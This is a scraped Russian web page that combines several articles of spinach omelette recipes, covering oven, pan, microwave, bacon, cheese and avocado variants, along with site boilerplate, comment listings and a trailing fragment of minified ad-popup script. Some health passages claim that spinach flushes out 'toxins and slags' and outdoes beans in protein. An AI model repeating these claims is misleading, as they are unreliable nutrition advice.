2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Омлет со шпинатом

Омлет со шпинатом

понедельник, 20 июня 2016 г.

Самое время для нового рецепта омлета в духовке, не находите? Это простое, вкусное и одновременно сытное блюдо, которое можно запросто приготовить для всей семьи. Но сегодня у нас не простой омлет, а вот такой по-летнему позитивный, яркий и насыщенный. Приготовим его с большим количеством свежего шпината — вкус и польза в одном блюде гарантированы.

Нужно сказать, что о пользе шпината можно писать долго-долго – некоторые литературные источники даже упоминают о нем, как о короле овощей. И на самом деле шпинат является рекордсменом по содержанию витаминов и минеральных веществ, которые необходимы для правильного формирования и развития детских костей. Именно поэтому с юных лет приучайте своих малышей к полезной домашней пище, но помните, что шпинат не рекомендуется людям с нарушениями водно-солевого обмена, а также заболеваниями печени и почек.

Ингредиенты:

Приготовление блюда по шагам:

Для приготовления вкусного и полезного омлета со шпинатом возьмем куриные яйца (у меня примерно по 60 граммов каждое), молоко любой жирности, свежий шпинат, сливочное масло и соль. Думаю, такой омлет можно приготовить и с замороженным шпинатом.

Включаем греться духовку (180 градусов) и первым делом займемся шпинатом. Нужно тщательно промыть каждый листочек, потому что на них много песка и бывает тля. Для омлета используются целые листочками, поэтому стебли обрываем — получается большая миска. Тщательно обсушиваем листочки, так как лишняя влага нам совершенно ни к чему.

Затем нарезаем зелень тонкими полосками — шпинат подготовлен.

В другую посуду разбиваем куриные яйца комнатной температуры. У меня домашние, поэтому и желток у них прямо оранжевый.

Добавляем соль по вкусу и разбалтываем яйца вилкой или венчиком. Взбивать не нужно, иначе при выпечке омлет сильно увеличится в объеме, после чего опадет. А при перемешивании объем омлета останется практически неизменным, но зато в нем будет много воздушных пузырьков.

Добавялем к яйцам молоко комнатной температуры и все перемешиваем.

Получается практически однородная омлетная масса.

Переливаем ее к измельченному шпинату и перемешиваем.

Теперь берем подходящую по объему форму для запекания (у меня емкостью 1 литр) и перекладываем в нее омлетную смесь вместе со шпинатом. Разравниваем зелень и ставим готовиться в горячую духовку при 180 градусах на средний уровень примерно на 30-60 минут. Время приготовления омлета со шпинатом зависит от вашей духовки, а также размера (и, как следствие, высоты омлета) посуды. У меня он провел в духовке 45 минут.

Омлет со шпинатом будет готов, когда при нажатии на него вы почувствуете упругость. Внутри ничего не должно оставаться жидким.

Даем готовому омлету несколько минут остыть и перекладываем его на блюдо.

Такой омлет отлично держит форму и замечательно нарезается на порции. Вот такой яркий и аппетитный омлет получается из домашних яиц. С магазинными, конечно, он будет гораздо светлее, но получится таким же вкусным, нежным и сочным. Попробуйте! и. Рецептом этого изумительного блюда поделилась Оленька Стихарева, за что я ей очень признательна! Кстати, еще у меня есть рецепт не менее вкусной яичницы со шпинатом — просто пальчики оближешь!

Тонкости приготовления омлета со шпинатом

Простой омлет с добавлением шпината разнообразит привычное блюдо и удовлетворит любителей вкусной и здоровой еды. Сочетание диетического белка в яйцах и множества полезных веществ в шпинате насытит организм качественной энергией. О том, как приготовить это блюдо на сковороде или в микроволновке с пошаговыми рекомендациями, и о нескольких вариантах приготовления омлета со шпинатом пойдет речь в нашей статье.

Польза и калорийность

Пожалуй, нельзя найти более полезного, быстрого, вкусного и низкокалорийного блюда для завтрака, чем омлет со шпинатом. Содержание большого количества белков и жиров (если омлет приготовлен на масле) при низкой калорийности всего 125-128 ккал на 100 граммов – это находка для тех, кто стремится к стройности. Неоспоримую пользу приносят организму как отдельно взятые куриные яйца, так и зеленый шпинат, но, соединившись, в одном блюде эти продукты удивительно дополняют друг друга, лучше усваиваясь.

Многие диетологи рекомендуют начинать день именно с куриных яиц, приготовленных разными способами. В омлете сохраняются все ценные свойства яиц – из витаминов это А, С, D, Е, несколько представителей витаминов из группы В, в том числе необходимая для нервной деятельности фолиевая кислота. Омлет на завтрак покрывает потребность организма в таких минералах, как магний, калий, железо, фосфор, цинк и других. А белки и аминокислоты, содержащиеся в омлете, являются оптимальными для усвоения нашим организмом.

Шпинат относят к листовым зеленым овощам, из-за большой пользы их еще называют суперпродуктами. Перечислять полезные свойства этого листового овоща можно долго, основные из них – это содержание лютеина, железа, витамина К и массы полезных минералов. Сохраняются они и после тепловой обработки шпината и даже после его разморозки.

Рекомендации кулинаров

Чтобы омлет со шпинатом удался с первого раза, стоит прислушаться к советам специалистов.

  • Лучше выбирать зелень молодого, непереросшего шпината, тогда наверняка он не будет горчить. Листья шпината должны быть широкими, насыщенного темно-зеленого цвета.
  • В сезон урожая можно запастись листовым овощем впрок, это практически никак не отразится на его полезных свойствах. Употребляйте замороженный или даже высушенный листовой овощ. С размороженного шпината следует сливать воду, а сушеный заливают кипятком перед приготовлением на 20-30 минут, потом его также отжимают.
  • Вначале на сковороду отправляют тушиться шпинат, потом яичную основу омлета. Если омлет будет готовиться в духовке или микроволновке, то овощи и яйца смешивают.
  • Омлет станет пышнее, если готовить его под закрытой крышкой.
  • Перед приготовлением омлета рекомендуется проверять свежесть яиц, разбивая их в емкость по одному – у яиц с вышедшим сроком годности можно почувствовать неприятный запах.
  • Обладая нейтральным вкусом, зелень шпината может впитывать ароматы любых других специй и трав.
  • Шпинат подвергают недолгому пассерованию, вкуснее он получается на масле сливочном.

Рецепты

Омлет со шпинатом – блюдо, отлично сочетающее пользу этих двух основных составляющих, готовится легко и быстро. В него можно добавить и другие ингредиенты, они придадут различные вкусовые оттенки блюду. Рассмотрим приготовление омлета со шпинатом по разным рецептам.

Классический с молоком

Продукты на одну порцию:

  • 2 яйца;
  • треть стакана молока;
  • 1 пучок (10-12 листочков) шпината;
  • масло для обжаривания – 20 граммов;
  • перец, соль.

Рассмотрим процесс приготовления.

  • Листву шпината помыть, дать обсохнуть на полотенце, или промокнуть влагу бумажной салфеткой. Удалить стебли ножом, а листья, плотно сжав, нарезать на тонкие полоски.
  • На сковороде (или в сотейнике) разогреть масло для обжаривания, сливочное или растительное – по желанию. Потушить шпинат, помешивая на небольшом огне, 4-5 минут.
  • В глубокой чаше кухонным венчиком взбить яйца, потом влить молоко, посолить, поперчить, по желанию можно приправить смесью пряных трав.
  • К шпинату на сковороду отправить яично-молочную жидкость, лопаткой равномерно распределив ее по всей поверхности. Снизить огонь, и накрыть крышкой.
  • Перемешивать и переворачивать массу не следует. За 8-9 минут на огне омлет будет приготовлен.

Такой традиционный омлет со шпинатом, сдобрив его сметаной или йогуртом с зеленью, подают со свежей булкой чиабатта или с бородинским хлебом.

В микроволновке

Легкий и быстрый вариант омлета со шпинатом можно приготовить без масла в микроволновке. Омлет со шпинатом и сладким перцем по следующему рецепту получится очень пышным благодаря разрыхлителю в составе ингредиентов. Итак, понадобится:

  • зелень шпината – 8-10 листьев;
  • 1/2 часть сладкого болгарского перца;
  • яйца – 3 шт.;
  • молоко – 60-70 мл;
  • разрыхлитель (или сода, смешанная с лимонной кислотой) – на кончике ножа;
  • мука – 2 ст. ложки;
  • соль.

Приготовление включает ряд шагов.

  • Ополоснуть тщательно шпинатную зелень водой, хорошо встряхнуть от воды или промокнуть бумажным полотенцем.
  • Половину плода сладкого перца порезать небольшими кубиками.
  • В глубокую емкость влить яйца, молоко, щепотку разрыхлителя, соль. Взбивать смесь миксером, понемногу высыпая в нее муку и следя за тем, чтобы не было комочков.
  • В чашу, предназначенную для готовки в СВЧ-печи, положить смесь из перца и шпината, равномерно залить взбитой омлетной жидкостью.
  • Готовить в течение 6-7 минут на средней мощности микроволновой печи, готовое блюдо припорошить свежей зеленью.

С беконом

Вариант омлета со шпинатом и подкопченным беконом оценят представители сильной половины человечества, предпочитающие не только вкусный и полезный, но и сытный завтрак. Одну порцию омлета готовят из следующих продуктов:

  • горсть листьев шпинатной зелени;
  • 2 яйца;
  • 2-3 полоски бекона;
  • масло для жарки лука;
  • половина луковицы или одна маленькая;
  • соль по необходимости.

Пошаговое приготовление состоит из нескольких действий.

  • Вымыть листья шпината, отряхнуть от воды, срезать черенки. Порезать или порвать не слишком мелко.
  • В сковороде на небольшом количестве масла обжарить лук до прозрачности.
  • К луку выложить бекон, нарезанный поперек шириной 3-4 см.
  • Когда появится аромат обжаренного бекона, перевернуть его на другую сторону, и выложить в сковороду шпинат.
  • Яйца отдельно взболтать, вылить на сковороду, посолить, если бекон не слишком соленый. Переворачивать или перемешивать массу не следует.
  • Убавить огонь для равномерного приготовления. Через 6-7 минут вкусный и сытный омлет будет готов.

С сыром, помидором и чесноком

Для одной порции пикантного омлета со шпинатом, твердым сыром и чесноком потребуется:

  • 10-12 листьев шпината свежего или замороженного – 80-100 граммов;
  • 1 ст. ложка масла сливочного;
  • 2-3 яйца;
  • 5 ст. ложек молока;
  • небольшой брусочек сыра твердого – 40 граммов;
  • 1 некрупный помидор;
  • половину чесночного зубчика;
  • соль, перец.

Начнем процесс приготовления.

  • Листья свежего, чистого и обсушенного шпината порубить на широкие полоски. Размороженную зелень отжать от воды и порезать при необходимости.
  • Мелко порубить чеснок, помидор порезать на 2-3 дольки, сыр натереть.
  • В сотейнике с горячим маслом слегка обжарить чеснок. Шпинат практически сразу положить к чесноку, тушить всё около трех минут.
  • Яйца взболтать вилкой, налить к ним молоко, приправить солью, перцем, всыпать весь сыр.
  • Яично-сырную смесь вылить к шпинату, дольки помидора вложить внутрь смеси.
  • Накрыть крышкой и уменьшить огонь. Готовность омлета можно ожидать через 5 минут.

Острый омлет с перцем чили и авокадо

Сделать омлет еще полезней может добавленный в него авокадо в сочетании с острым перцем чили. Для рецепта омлета со шпинатом, перцем чили и авокадо понадобится:

  • шпинат – горсть из 8-10 листьев;
  • 3 яйца;
  • треть стакана молока;
  • 1 маленькая луковица;
  • 1 авокадо;
  • свежий перец чили (без семян) – 10 граммов или молотый красный перец на кончике ножа;
  • 50 граммов рассольной Брынзы;
  • 2-3 помидора черри;
  • масло для обжаривания;
  • соль.

Перечислим все этапы приготовления.

  • Чистые, промытые и обсушенные листья шпината нарезать ножом.
  • Авокадо без кожуры и очищенную луковицу покрошить некрупно на кубики. Брынзу измельчить также на кубики.
  • Черри-томаты разделить пополам.
  • Яйца взболтать с молоком, специями, солью. Положить в яично-молочную жидкость мелко порезанный перец чили или молотый порошок из него, а также кубики авокадо и Брынзы.
  • В сковороде с горячим маслом пожарить лук до прозрачности. Затем следует потушить шпинат в течение трех минут.
  • К готовому луку и шпинату выложить помидоры черри и сразу же вылить яично-молочную смесь с кусочками авокадо и брынзы.
  • Закрыть крышкой, через 5-7 минут омлет будет готов.

Острый омлет хорошо подавать с хрустящими тостами и запивать молочным коктейлем или йогуртом для нейтрализации остроты.

На тарелке омлет со шпинатом рекомендуется сочетать с консервированным горошком, фасолью или кукурузой, со свежими огурцами, помидорами, листьями салата. Полноценным обедом станет омлет со шпинатом и отварной куриной грудкой. Специалисты по питанию рекомендуют есть омлет со шпинатом не только с различными соусами, но и добавляя в него разные орешки – арахис, грецкий, кешью, пекан или кедровые.

Видеорецепт омлета со шпинатом и сыром смотрите ниже.

Блюда из шпината, Омлет

Рецепты вторых блюд → Омлет

Блюда из шпината

Оригинальный и простой завтрак на скорую руку — кюкю со шпинатом, зелёным луком, петрушкой и укропом. Обилие зелени в этом блюде не только насытит организм витаминами утром, но и поднимет настроение своим ярким и необычным видом.

Такая шпинатная фриттата очень вкусная и, к тому же, имеет яркий, эстетичный вид, что позволяет подать блюдо на любой стол.

Такая фриттата очень легкая и вкусная, готовится традиционно из яиц, шпината и помидоров.

Этот яркий овощной омлет — настоящий кладезь витаминов! Конечно, немного усилий придется приложить, зато ваша семья получит вкусный и полезный завтрак.

Омлет, рецепт со шпинатом и начинкой из грибов и овощей. Яркий, вкусный и ароматный омлет со шпинатом запросто украсит стол.

Набор продуктов для этого сытного омлета очень простой: шпинат, яйца, сыр, вяленые помидоры, лук и чили.

Фриттата — итальянский омлет с разными добавками: сыром, овощами и т.д. Быстрая в приготовлении и очень полезная фриттата со шпинатом станет отличным завтраком для всей семьи!

Омлет со шпинатом и крабовыми палочками — полезное и быстрое в приготовлении блюдо для завтрака, которое наверняка понравится вашим родным!

Страта — американское блюдо, очень похожее на омлет в духовке или запеканку из яиц и прочих ингредиентов. Я готовлю страту с крутонами, шпинатом и фетой.

Готовится этот сытный и вкусный омлет с грибами, шпинатом, ростками фасоли, консервированными каштанами и жареной свининой.

Рецепт полезного, вкусного и сытного завтрака — омлет со шпинатом, сладким перцем и укропом.

Все права на материалы, находящиеся на сайте www.RussianFood.com, охраняются в соответствии с действующим законодательством. При любом использовании материалов сайта, гиперссылка (hyperlink) на www.RussianFood.com обязательна.

Администрация сайта не несет ответственности за результат применения приведенных кулинарных рецептов, методик их приготовления, кулинарных и прочих рекомендаций, работоспособность ресурсов, на которые размещены гиперссылки, и за содержание рекламных объявлений. Администрация сайта может не разделять мнения авторов статей, размещённых на сайте www.RussianFood.com

Этот сайт использует файлы cookie, чтобы предоставить вам наилучший сервис. Оставаясь на сайте, вы соглашаетесь с политикой сайта по обработке персональных данных. СОГЛАСЕН

Омлет со шпинатом

У нас выросла первая зелень, а тут ещё из поездки привезли домашних яиц, очень захотелось омлета, но чтобы он был не просто омлет, а с полезной добавкой. У меня в качестве добавки любимый шпинат выращенный на своем огороде, вернее в теплице.

Ингредиенты для «Омлет со шпинатом»:

  • Яйцо куриное (количество по усмотрению) — 8 шт
  • Молоко (на одно яйцо 30 мл молока) — 240 мл
  • Шпинат (свежий) — 150 г
  • Соль — по вкусу
  • Масло сливочное (для смазки формы)

Время приготовления: 40 минут

Количество порций: 4

Рецепт «Омлет со шпинатом»:

Шпинат помыть, просушить, нарезать.

Яйца с солью взбить вилочкой, долго взбивать не нужно.
Количество яиц и молока можете брать на своё усмотрение.
Я всегда беру на одно яйцо 30 мл молока.

К яичной смеси добавить молоко, шпинат.
Перемешать.

Форму смазать сливочным маслом и вылить в неё омлетную смесь.
У меня силиконовая форма объемом 1 литр.

Выпекать омлет в разогретой до 180 градусов духовке до готовности.
Готовность проверить нажатием на омлет, он должен быть упругим.
Время на запекание уходит в зависимости от количества яиц, молока и размера формы. в среднем от 20 до 30 минут.

У меня шпината было очень много в омлетной смеси, думала будет его достаточно, чтобы он распределился по всему омлету. а он под воздействием температуры «усел» и поднялся вверх.
Вышел вот такой контрастный омлет.
Можно приготовить омлет без добавок.

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Вкусный завтрак

  • 14
  • 41
  • 2377

Омлет от дядюшки Викинга

  • 26
  • 28
  • 3865

Яичный ролл

  • 3
  • 50
  • 1291

Омлет с творогом и шпинатом

  • 97
  • 409
  • 5294

Омлет с орехами

  • 12
  • 19
  • 1801

Овощной омлет с отрубями в пакете

  • 55
  • 673
  • 7429

Крымская яичница

  • 28
  • 23
  • 2929

Омлет с чесночными стрелками

  • 22
  • 96
  • 2780

Омлет в микроволновке

  • 43
  • 204
  • 4459

Попробуйте приготовить вместе

Салат «Дурдом Ромашка»

  • 178
  • 365
  • 66744

Куриное филе «Колбаса вареная»

  • 34
  • 1141
  • 14651

Торт «Птичье молоко» на агаре

  • 83
  • 543
  • 71094

Фотографии «Омлет со шпинатом» от приготовивших (2)

Комментарии и отзывы

4 апреля 2017 года solnyshko m #

4 апреля 2017 года marusjala #

4 апреля 2017 года Olgastih # (автор рецепта)

27 сентября 2016 года valentina ivan #

27 сентября 2016 года Olgastih # (автор рецепта)

28 июля 2016 года JeSeKi # (модератор)

28 июля 2016 года Olgastih # (автор рецепта)

3 мая 2016 года zerro #

4 мая 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года yugai ludmila65 #

29 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года veronika1910 #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года Демурия #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года skyfuntik #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года Ирушенька #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года Беннито #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года krolya13 #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года mazziadri #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года АУРИЧКА #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года гошлена #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года гошлена #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года мясная душа #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года Сирена #

28 апреля 2016 года Olgastih # (автор рецепта)

27 апреля 2016 года ogiway #

28 апреля 2016 года Olgastih # (автор рецепта)

28 апреля 2016 года ogiway #

28 апреля 2016 года Olgastih # (автор рецепта)

29 апреля 2016 года ogiway #

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Готовим полезную еду: омлет со шпинатом

Шпинат в нашей стране не так сильно популярен, как, например, в европейских странах. Во Франции его называют «королевским листовым овощем», выращивают его везде, где только есть место. Достоверно неизвестно, где он появился, предположительно в Персии, на Ближнем Востоке еще до нашей эры, то есть очень давно.

А затем через много столетий арабы его привезли к испанским берегам, так он и попал в Европу. Далее он уже «поселился» и в Америке, где и по сей день его очень уважают и почитают. У жителей США растение набрало огромную популярность. Шпинатные листья не отличаются таким ярким и выразительным вкусом, как другая зелень или овощи. Они недолго хранятся, сравнительно быстро теряют свежесть. Так почему они так популярны?

Все дело в полезных веществах, а их у шпината немало — это белки, углеводы и даже жиры, ненасыщенные и органические кислоты, сахара, крахмал и клетчатка, множество микроэлементов и витаминов. Основная его ценность состоит в том, что он содержит в себе белка больше, чем такие бобовые, как фасоль и зеленый горошек.

Даже при тепловой обработке в шпинате сохраняются многие витамины и элементы. Несомненно, что другие овощи и зелень также обладают ценными свойствами, но такого богатого состава вы не встретите нигде — пользу нельзя недооценивать. Насыщая организм питательными веществами, шпинат выводит токсины и шлаки, повышая гемоглобин. Он помогает насыщать клетки кислородом, стимулирует обмен веществ и заряжает ваш организм энергией на весь день.

Витаминный омлет

Омлет со шпинатом — очень полезное и вкусное блюдо. Его можно делать на полдник, дополнить им свой обед, но самым удачным будет его приготовление на завтрак! Быстрее всего получится накормить себя и своих близких полезным омлетом, если вы сделаете его на сковороде. Такой омлет готовится на медленном огне с добавлением сливочного масла.

  • 6 яиц
  • шпинат — 500 граммов
  • молоко — 50 миллилитров
  • сливочное масло — 50 граммов
  • зелень — ½ пучка
  • мука — 50 граммов

Шпинат для этого блюда нет необходимости предварительно обрабатывать, его также не нужно обжаривать. Промойте листья, стряхните воду, мелко порежьте, и он уже готов к использованию. Для самого омлета смешайте яичные желтки с молоком, аккуратно введите муку, посолите смесь. Покрошите мелко зелень, петрушку или укроп, лучше, если будет оба вида.

Добавьте к омлетному тесту зелень, а затем только введите в тесто белки. Растопите кусочек масла сливочного на сковороде и вылейте туда ваш омлет. На небольшом огне жарьте до того состояния, когда низ схватится, а верх еще будет влажным. В этот момент снимите крышку, выложите порезанные шпинатные листья и сложите омлет пополам, прикройте и дайте пропечься еще минут 5-10.

Омлет со шпинатом в духовке

Этот рецепт предназначен для приготовления вкуснейшего блюда в духовке. Да, это займет немного больше времени, чем если бы вы жарили его на сковороде. Но учтите, что омлет со шпинатом, приготовленный в духовке, будет выше, пышнее и красивее.

  • шпинат — 400 граммов
  • 4 яйца
  • мука — 40 граммов
  • растительное масло — 50 миллилитров
  • чеснок — 1-2 дольки
  • зелень — ½ пучка
  • молоко — 70 миллилитров

Вымойте тщательно листья шпината. Лучше это делать в сите или дуршлаге, чтобы потом стекла лишняя вода. Если будете добавлять в омлет зелень, ее тоже промойте вместе со шпинатом. Подойдет петрушка, кинза, укроп, ну и, конечно, лук. Чем разнообразнее окажется зелень, тем вкус вашего омлета будет богаче. Подсолнечным маслом смажьте форму, в которой планируете выпекать блюдо.

Как раз подошло время заняться самим омлетом. В глубокую посуду влейте яйца, взбейте их венчиком, добавьте молока и немного соли, не помешает и щепотка молотого перца. Введите муку. Сильно взбивать не нужно — главное, чтобы компоненты хорошо разошлись и получилась равномерная консистенция смеси. Шпинат нарежьте как можно мельче. В смазанную форму выложите этот порубленный овощ, сверху вылейте тесто для омлета и отправьте в духовку. На 30 минут вы можете забыть о нем. Омлет можно доставать, когда красиво подрумянится верхняя корочка. Порубите мелко дольки молодого чеснока и выложите его на еще горячее кушанье. Заранее продумайте салат к этому блюду, напитки.

Сырный омлет с пряностями и шпинатом

Этот омлет со шпинатом, в рецепт которого входит три вида сыра, зелень и пряности, — его оценят все члены вашей семьи, он понравится как детям, так и взрослым. Ароматный и очень привлекательный омлет с семечками и сырной корочкой, больше похожий на запеканку, станет отличным ужином для всей семьи.

  • яйца — 4 штуки
  • сыр чеддер — 30 граммов
  • сыр пармезан — 30 граммов
  • сыр моцарелла — 50 граммов
  • шпинат — 300 граммов
  • молоко — 100 миллилитров
  • сливки — 100 миллилитров
  • лук — 1 штука
  • масло оливковое — 10 миллилитров
  • масло сливочное — 10 граммов
  • чеснок — 1 зубчик
  • мускатный орех — щепотка
  • семена подсолнечника — 1 столовая ложка

Включите духовку на отметке 180 0 С, и пока она прогревается, вы можете заняться непосредственно начинкой для омлета. Положите на сковороду кусочек сливочного масла, пошинкуйте лук и чеснок и потушите на сковороде до прозрачного состояния. Добавьте порезанный мелко шпинат и тушите еще около 10 минут, накрыв крышкой. В отдельной посуде взбейте яйца, влейте к ним сливки и молоко. Посыпьте специями и солью, не забудьте про мускатный орех, он придаст вашему омлету необычный вкус и аромат.

Добавьте в кушанье шпинат, ядра от подсолнечника. Все три вида сыра натрите на терке. В омлетную смесь всыпьте моцареллу и пармезан, перемешайте. Переложите все это в форму для духовки, сверху посыпав сыром чеддер. Выпекайте при средней температуре в 180 0 С около 30 минут. Достав из духовки, дайте ему возможность постоять минут 10 на столе. А затем можете звать всех к столу. Приятного аппетита!

Испанский омлет со шпинатом

Рецепт этого блюда — еще одна фантазия на тему применения шпината в кулинарии. Как еще разнообразить уже привычное блюдо? На самом деле в омлет можно добавить еще великое множество начинок — мясных, овощных, травяных, грибных. Испанский омлет по своему составу скромен, но от этого не менее вкусен. Пробуйте!

  • шпинат — 300 граммов
  • 2 картофелины
  • 6 яиц
  • пучок петрушки
  • пучок кинзы
  • 10 миллилитров оливкового масла
  • 1 луковица
  • щепотка соли
  • щепотка черного перца

Отварите две картофелины «в мундирах» до готовности. Остудите и снимите кожуру, нарежьте овощи кружочками. Луковицу очистите и порежьте полукольцами, а затем сделайте из нее зажарку на растительном масле. Под водой вымойте листья шпината, отряхните их, промокните полотенцем. Порежьте их мелко ножом. В сковороду к луку добавьте сначала шпинатные листья, а потом картофель. Держите на огне до тех пор, пока картофель не подрумянится до корочки.

Яйца взбейте в глубокой пиалке, посолите, добавьте щепотку молотого перца. Мелко пошинкуйте зелень — кинзу и петрушку — и добавьте ее к яйцам. Этой омлетной массой залейте овощи, которые к этому времени уже должны будут поджариться на сковородке. Продолжайте готовить омлет, накрыв его крышкой. В общей сложности вам понадобится еще минут 10, после чего можно будет сервировать стол.

Если вы ведете здоровый образ жизни, и желаете правильно питаться, советуем обратить ваше внимание на полезные блюда со шпинатом: в данном случае это омлет. Его можно готовить разными способами, как очень просто — в сковороде, так и с применением техники — в мультиварке или же в духовом шкафу.

Можно добавлять к перечисленным компонентам разнообразные начинки, дополнять омлеты гарнирами, салатами, мясными блюдами — действуйте, экспериментируйте, создавайте кулинарные шедевры.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
